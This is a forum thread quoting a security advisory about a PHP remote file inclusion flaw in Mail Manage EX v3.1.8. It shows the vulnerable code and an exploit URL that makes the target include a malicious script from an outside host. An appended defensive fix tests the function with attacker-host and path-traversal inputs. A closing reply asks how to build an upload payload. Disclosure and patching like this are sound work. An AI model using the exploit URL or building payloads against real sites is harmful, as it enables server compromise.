
qcred11
QUOTE


Description: PHP Include Exploit in Mail Manage EX v3.1.8
Compromise: a malicious PHP script from an external host may be included and
executed.
Vulnerable Systems: all systems using mmex.php v3.1.8 and maybe lower (not
tested).
Details:
The PHP Include exploit exists in the following code,


mmex.php--SNIP----->
#===========================================================
# Register Globals
#===========================================================


$Settings = $_REQUEST['Settings'];
$Refresh = $_REQUEST['Refresh'];
$FormRecipient = $_REQUEST['Recipient'];
$EMAIL[0] = $_REQUEST['email'];
$EMAIL[1] = $_REQUEST['Email'];
$EMAIL[2] = $_REQUEST['E_mail'];
$EMAIL[3] = $_REQUEST['e_mail'];
$EMAIL[4] = $_REQUEST['email_address'];
$EMAIL[5] = $_REQUEST['Email_Address'];
$EMAIL[6] = $_REQUEST['Email_address'];


#===========================================================
# CHECK SETTINGS & FORM RECIPIENT
#===========================================================
if(!$Settings)
  exit ("<b>No settings were found for this form.</b>");


$Include = @include($Settings);
if (!$Include)
exit ("<b>Incorrect settings filename in your form or specified file does
not exist.</b>");
mmex.php---EOF----->


"$Settings" can be used to Include malicious PHP code.


How to exploit this bug?


http://www.target.com/mail/mmex.php?Seting...b0x/malicious.php

malicious.php is executed by the target.

Solution:
No solution provided.
Gregg Kenneth Jewell of "Mail Manage EX" is informed.

Greetings,

Jan van de Rijt aka The Warlock.
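
The advisory lists no fix. As an added example (not part of the original post and not Mail Manage EX code), this is one way the `@include($Settings)` call could be constrained to files inside a single settings directory. The names `SETTINGS_DIR` and `resolve_settings_file()` and the `settings/` directory layout are assumptions.

```php
<?php
// Added example, not Mail Manage EX code. SETTINGS_DIR and
// resolve_settings_file() are hypothetical names; the settings/ directory
// next to the script is an assumed layout.
const SETTINGS_DIR = __DIR__ . '/settings';

/**
 * Map the request-supplied "Settings" value to a file inside $dir,
 * or return null when the value cannot be trusted.
 */
function resolve_settings_file($name, string $dir = SETTINGS_DIR): ?string
{
    // Arrays (Settings[]=x) and empty values are rejected outright.
    if (!is_string($name) || $name === '') {
        return null;
    }
    // Bare file name only: no scheme (http://, ftp://, php://), no directory
    // separators, no "..", no NUL byte, fixed .php suffix.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $name)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name);
    // realpath() returns false for missing files and resolves symlinks, so a
    // link that points outside the settings directory fails the prefix check.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// In mmex.php this would stand in for "$Include = @include($Settings);":
//   $file = resolve_settings_file($_REQUEST['Settings'] ?? null);
//   if ($file === null) exit("<b>No settings were found for this form.</b>");
//   include $file;

// Constructed inputs, including the remote-URL shape from the advisory.
// 'contact.php' is accepted only if settings/contact.php actually exists.
$samples = ['contact.php', 'http://attacker.example/malicious.php',
            '../../etc/passwd', 'php://input', ['contact.php']];
foreach ($samples as $s) {
    $r = resolve_settings_file($s);
    printf("%-45s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
           $r === null ? 'rejected' : $r);
}
```

Setting `allow_url_include = Off` in php.ini (PHP 5.2 and later, where it is the default) blocks the remote-URL case but not inclusion of local files, so the file-name check is still needed.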

BuzzDee
hmmm how should a php-script look like that it executes an ftp upload script? dunno much about php :S